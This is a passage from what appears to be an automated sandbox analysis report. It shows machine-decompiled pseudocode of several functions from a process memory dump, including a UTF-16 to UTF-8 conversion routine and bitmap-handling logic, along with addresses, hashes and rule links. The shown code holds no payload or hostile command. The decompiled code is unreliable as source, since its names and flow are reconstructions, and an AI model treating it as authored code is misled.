									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E01A2AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1ad8474 - 3;
										if( *0x1ad8474 != 3) {
											 *0x1ad79dc =  *0x1ad79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01A07D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01A07D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01A67016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1ad8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1ad7b00; // 0x0
							asm("ror esi, cl");
							 *0x1adb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E01A295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E019F7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x01a103f1
0x01a103f7
0x01a103f9
0x01a103fb
0x01a103fd
0x01a10400
0x01a1040a
0x01a54c7a
0x01a10537
0x01a10547
0x01a10410
0x01a10410
0x01a10414
0x01a10417
0x01a1041a
0x01a10421
0x01a10424
0x01a1042b
0x01a1043b
0x01a1043e
0x01a1043f
0x01a1043f
0x01a10446
0x01a10449
0x01a1044c
0x01a1044f
0x01a10459
0x01a54c8d
0x01a1045f
0x01a1045f
0x01a1045f
0x01a10467
0x01a54c97
0x01a54c9d
0x01a54ca4
0x01a54caa
0x01a54caf
0x01a54cb1
0x01a54cc3
0x01a54cb3
0x01a54cbc
0x01a54cbc
0x01a54cc8
0x01a54ccb
0x01a54cd7
0x01a54cda
0x01a54cdf
0x01a54cdf
0x01a54ccb
0x01a54ca4
0x01a1046d
0x01a1046f
0x01a1046f
0x01a10471
0x01a10476
0x01a1047a
0x01a1047b
0x01a10483
0x01a10489
0x01a1048d
0x00000000
0x00000000
0x01a54ce9
0x01a54cef
0x01a54d22
0x01a54d22
0x00000000
0x01a54d22
0x01a54cf1
0x01a54cf7
0x00000000
0x00000000
0x01a54cf9
0x01a54cff
0x00000000
0x00000000
0x01a54d05
0x01a54d07
0x00000000
0x00000000
0x01a54d0d
0x01a54d0f
0x01a54d14
0x01a54d16
0x00000000
0x00000000
0x01a54d1c
0x01a54d1c
0x01a10499
0x01a10535
0x01a10535
0x00000000
0x01a10535
0x01a104a6
0x01a54d2c
0x01a54d37
0x01a54d39
0x01a54d3b
0x00000000
0x00000000
0x01a54d41
0x01a54d48
0x01a10527
0x01a1052b
0x01a1052d
0x01a10530
0x01a10530
0x00000000
0x01a1052b
0x01a54d4e
0x01a104ac
0x01a104ac
0x01a104af
0x01a104b2
0x01a104b7
0x01a104b9
0x01a104bb
0x01a104bd
0x01a104bf
0x01a104c5
0x01a104c9
0x01a54d53
0x01a54d59
0x01a54db9
0x01a54dba
0x01a54dbf
0x01a54dc2
0x01a54dc4
0x01a54dc7
0x01a54dce
0x00000000
0x01a54dce
0x01a54d5b
0x01a54d61
0x00000000
0x00000000
0x01a54d63
0x01a54d69
0x00000000
0x00000000
0x01a54d6b
0x01a54d6e
0x01a54d74
0x01a54d76
0x01a54d7c
0x01a54d7e
0x01a54d84
0x01a54d89
0x01a54d8c
0x01a54d8d
0x01a54d92
0x01a54d95
0x01a54d96
0x01a54d98
0x01a54d9a
0x01a54d9f
0x01a54da4
0x01a54da6
0x01a54da8
0x01a54daf
0x01a54db1
0x01a54db1
0x01a54daf
0x01a54da6
0x01a54d84
0x01a54d7c
0x00000000
0x01a54d74
0x01a104d6
0x01a54de1
0x01a104dc
0x01a104dc
0x01a104dc
0x01a104e4
0x01a54deb
0x01a54df1
0x01a54df8
0x01a54dfe
0x01a54e03
0x01a54e05
0x01a54e17
0x01a54e07
0x01a54e10
0x01a54e10
0x01a54e1c
0x01a54e1f
0x01a54e35
0x01a54e35
0x01a54e1f
0x01a54df8
0x01a104f1
0x01a104fa
0x01a54e3f
0x01a54e47
0x01a54e5b
0x01a54e61
0x01a54e67
0x01a54e69
0x01a54e71
0x01a54e73
0x01a10500
0x01a10500
0x01a10500
0x01a104fa
0x01a10508
0x01a1051d
0x01a1051d
0x01a1051f
0x01a10524
0x00000000
0x01a10524
0x01a10515
0x01a10517
0x01a54e7a
0x01a54e7c
0x00000000
0x00000000
0x01a54e85
0x00000000
0x01a54e85
0x00000000
0x01a10517

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5e0b0227ccf214a09ecae551b2042636b62c4c7fd2107fa3ce7ed00d397084
Instruction ID: f4644c4950bca3cd4378425f20042e1f9900cdb92809d54ae8045c5eb52b1560
Opcode Fuzzy Hash: ad5e0b0227ccf214a09ecae551b2042636b62c4c7fd2107fa3ce7ed00d397084
Instruction Fuzzy Hash: 7F916C32E046159FEB329BACC944BBD7BB4AF04724F090261FE11AB2D6E7749C84C781

Uniqueness

Uniqueness Score: -1.00%

Function 01A1EBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01A1EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E01A1ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x01a1ebb8
0x01a1ebbf
0x01a1ebc1
0x01a1ebc6
0x00000000
0x01a5b6d6
0x01a1ebcd
0x01a1ebd2
0x01a1ec95
0x01a5b6e0
0x01a1ec9b
0x01a1eca1
0x01a1eca1
0x01a1ec89
0x00000000
0x01a1ec89
0x01a1ebd8
0x01a1ebdd
0x01a5b6ea
0x00000000
0x01a1ebe3
0x01a1ebe5
0x01a1ebe7
0x01a1ebef
0x01a1ebf2
0x00000000
0x01a1ebf5
0x00000000
0x01a1ebf5
0x01a1ebf5
0x01a1ebf7
0x01a5b6f6
0x01a1ec7c
0x01a1ec7c
0x01a1ec7f
0x01a1ec82
0x01a1ec87
0x00000000
0x01a1ec87
0x01a1ec1a
0x01a1ec1a
0x01a1ec25
0x01a5b725
0x01a5b72c
0x01a5b72c
0x01a1ec2d
0x01a1ec31
0x01a5b73c
0x01a5b744
0x01a5b748
0x01a5b748
0x01a5b749
0x01a5b749
0x01a5b74a
0x01a5b74a
0x01a1ec3e
0x01a5b860
0x00000000
0x01a1ec44
0x01a1ec47
0x01a5b750
0x01a5b758
0x01a5b767
0x01a5b775
0x01a5b77c
0x01a5b77f
0x01a5b769
0x01a5b76c
0x01a5b76c
0x01a5b781
0x01a5b788
0x01a5b78b
0x01a5b75a
0x01a5b75d
0x01a5b75d
0x01a5b78d
0x01a5b792
0x01a5b793
0x01a5b793
0x01a1ec54
0x01a1ec56
0x01a1ec57
0x01a1ec59
0x01a1ec5e
0x01a1ecaa
0x01a1ed16
0x01a1ed16
0x01a1ecac
0x01a1ecaf
0x01a1ecb4
0x01a1ecb6
0x01a1ecb6
0x01a1ecb9
0x01a1ecbf
0x01a5b7c1
0x01a5b7c8
0x01a5b7d3
0x01a5b7db
0x01a5b7ec
0x01a5b858
0x00000000
0x01a5b858
0x01a5b7ee
0x01a5b7f1
0x01a5b7f4
0x01a5b7ff
0x01a5b850
0x00000000
0x01a5b850
0x01a5b80a
0x01a5b813
0x01a5b81c
0x01a5b81d
0x01a5b822
0x01a5b825
0x01a5b828
0x01a5b831
0x01a5b832
0x01a5b837
0x01a5b840
0x01a5b842
0x01a5b845
0x01a5b848
0x00000000
0x01a5b848
0x01a5b7df
0x00000000
0x01a5b7df
0x01a5b7cc
0x00000000
0x01a5b7cc
0x01a1ecc5
0x01a1ecc7
0x01a1eccb
0x01a5b79b
0x01a5b79e
0x01a5b7a4
0x00000000
0x00000000
0x01a5b7a6
0x01a5b7a8
0x01a5b7a8
0x01a1ecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x01a1ecd5
0x01a1ecd5
0x01a1ecd5
0x01a1ecd8
0x01a1ecda
0x01a1ece4
0x00000000
0x00000000
0x01a1ecea
0x01a1eced
0x01a1ecf0
0x01a1ecf2
0x01a1ecfb
0x01a1ecfe
0x01a1ed01
0x01a1ed06
0x00000000
0x00000000
0x00000000
0x01a1ed06
0x01a5b7ae
0x01a5b7b1
0x01a5b7b7
0x00000000
0x00000000
0x01a5b7b9
0x01a5b7bb
0x01a1ed08
0x01a1ed08
0x01a1ed0c
0x01a1ed0c
0x00000000
0x01a1ec60
0x01a1ec62
0x01a1ed0f
0x01a1ed0f
0x00000000
0x01a1ed0f
0x01a1ec68
0x01a1ec6c
0x01a1ec6f
0x01a1ec75
0x01a1ec0d
0x01a1ec0d
0x01a1ec18
0x00000000
0x00000000
0x00000000
0x01a1ec18
0x01a1ec77
0x01a1ec79
0x01a1ec79
0x00000000
0x01a1ec68
0x01a1ec5e
0x01a1ec3e
0x01a1ebfd
0x01a1ec02
0x01a5b701
0x01a5b70c
0x01a5b71b
0x01a5b71d
0x01a5b71d
0x00000000
0x01a5b70c
0x01a1ec08
0x01a1ec0a
0x00000000
0x01a1ec0a
0x01a1ebf5
0x01a1ebf5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: e8fdda45693ee6e0287d837c7f43d028b9194b5ff5a44787e56107e13b9d2ed7
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 5D813A31A092568FEB264F6CC8C12BDBB62EF52211F2C467ADD428B745C235DC46D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 01AB1D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E01AB1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1ac1070);
				E01A3D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E01AB337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E01AB33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E01A296E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E01AB33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E01A1E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1ad5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E01A1DFDF(_t91, 1, _t142);
					}
					return E01A3D0D1(_t103);
				}
			}

0x01ab1d55
0x01ab1d55
0x01ab1d57
0x01ab1d5c
0x01ab1d63
0x01ab1d66
0x01ab1d69
0x01ab1d6c
0x01ab1d6e
0x01ab1d71
0x01ab1d74
0x01ab1d77
0x01ab1d7a
0x01ab1d7d
0x01ab1d82
0x01ab1d85
0x01ab1d88
0x01ab1d8d
0x01ab1d90
0x01ab1d94
0x01ab1d96
0x01ab1d98
0x01ab1d98
0x01ab1d9b
0x01ab1d9e
0x00000000
0x01ab1da1
0x01ab1da5
0x01ab1e78
0x01ab1e78
0x01ab1e82
0x01ab1e87
0x01ab1e8a
0x01ab1e8d
0x01ab1e92
0x01ab1e95
0x01ab1e98
0x01ab1e9b
0x01ab1ede
0x01ab1ee3
0x01ab1ee8
0x01ab1ef2
0x01ab1ef2
0x01ab1ef5
0x01ab1ef8
0x01ab1efe
0x01ab1f03
0x00000000
0x01ab1f09
0x01ab1f0c
0x01ab1f0e
0x01ab1f11
0x00000000
0x01ab1f17
0x01ab1f17
0x01ab1f1a
0x01ab1f31
0x01ab1f34
0x01ab1f3f
0x01ab1f42
0x01ab1f45
0x01ab1f47
0x01ab1f4a
0x01ab1f4d
0x01ab1f4f
0x01ab1f63
0x01ab1f65
0x01ab1f67
0x00000000
0x01ab1f69
0x01ab1f69
0x01ab1f72
0x01ab1f72
0x01ab1f75
0x01ab1f77
0x00000000
0x00000000
0x01ab1f6e
0x01ab1f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01ab1f70
0x01ab1f83
0x01ab1f83
0x01ab1f85
0x00000000
0x01ab1f85
0x01ab1f51
0x01ab1f53
0x01ab1f5a
0x01ab1f5c
0x01ab1f87
0x01ab1f87
0x01ab1f87
0x01ab1f8b
0x01ab1f8d
0x01ab1f90
0x00000000
0x01ab1f90
0x01ab1f1c
0x01ab1f1c
0x00000000
0x01ab1f22
0x01ab1f22
0x01ab1f25
0x01ab1f28
0x01ab1f97
0x01ab1f97
0x01ab1f9d
0x01ab1fa7
0x01ab1faa
0x01ab1fb1
0x01ab1fb9
0x01ab1fbd
0x01ab1fbe
0x01ab1fc0
0x01ab1f2a
0x01ab1f93
0x01ab1f93
0x01ab1f95
0x00000000
0x00000000
0x00000000
0x00000000
0x01ab1f95
0x01ab1f28
0x01ab1f1c
0x01ab1f1a
0x01ab1f11
0x01ab1e9d
0x01ab1ea0
0x01ab1eae
0x01ab1eb4
0x01ab1ebc
0x01ab1ebc
0x01ab1ec2
0x01ab1ec8
0x01ab1ecd
0x00000000
0x01ab1ed3
0x01ab1ed3
0x00000000
0x01ab1ed3
0x01ab1ecd
0x01ab1dab
0x01ab1dab
0x01ab1db1
0x01ab1db3
0x01ab1db9
0x01ab1dbf
0x01ab1dc2
0x01ab1dda
0x01ab1ddd
0x01ab1de0
0x01ab1de9
0x01ab1dec
0x01ab1def
0x01ab1df1
0x01ab1df3
0x01ab1e0a
0x01ab1e0c
0x01ab1e0e
0x00000000
0x01ab1e10
0x01ab1e10
0x01ab1e13
0x01ab1e16
0x01ab1e16
0x01ab1e19
0x01ab1e1c
0x01ab1e1e
0x01ab1e20
0x00000000
0x00000000
0x01ab1e22
0x01ab1e24
0x00000000
0x01ab1e26
0x00000000
0x01ab1e26
0x00000000
0x01ab1e24
0x01ab1e30
0x01ab1e30
0x00000000
0x01ab1e30
0x01ab1df5
0x01ab1df7
0x01ab1e01
0x01ab1e32
0x01ab1e34
0x01ab1e36
0x00000000
0x01ab1e36
0x01ab1dc4
0x01ab1dc4
0x00000000
0x01ab1dc6
0x01ab1dc6
0x01ab1dc9
0x01ab1dcf
0x01ab1dd1
0x01ab1e38
0x01ab1e38
0x01ab1e38
0x01ab1e38
0x01ab1dc4
0x01ab1dbb
0x01ab1dbb
0x01ab1dbb
0x01ab1dbb
0x01ab1e3a
0x01ab1e3a
0x01ab1e3d
0x01ab1e40
0x01ab1e43
0x01ab1e6f
0x01ab1fc7
0x01ab1fc7
0x01ab1e75
0x01ab1e75
0x00000000
0x01ab1e75
0x01ab1e6f
0x01ab1fca
0x01ab1fca
0x01ab1fce
0x01ab1fd0
0x01ab1fd0
0x01ab1fd3
0x01ab1fd9
0x01ab1fde
0x01ab1fe4
0x01ab1fe4
0x01ab1fee
0x01ab1fee

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1281e20004e1a38217aedd9037516bd09c3fbd7df83865b68ff95ff71e638b
Instruction ID: c2a3d46b2c1f1746322d72daddeea1681bbf5ef0b8e00f452a306165b853f63b
Opcode Fuzzy Hash: bc1281e20004e1a38217aedd9037516bd09c3fbd7df83865b68ff95ff71e638b
Instruction Fuzzy Hash: 3C819E71E00299CFDF18CFA8D5D09ECBBB5BF59314B18422AE012AB3C6DB319946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019EC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E019EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
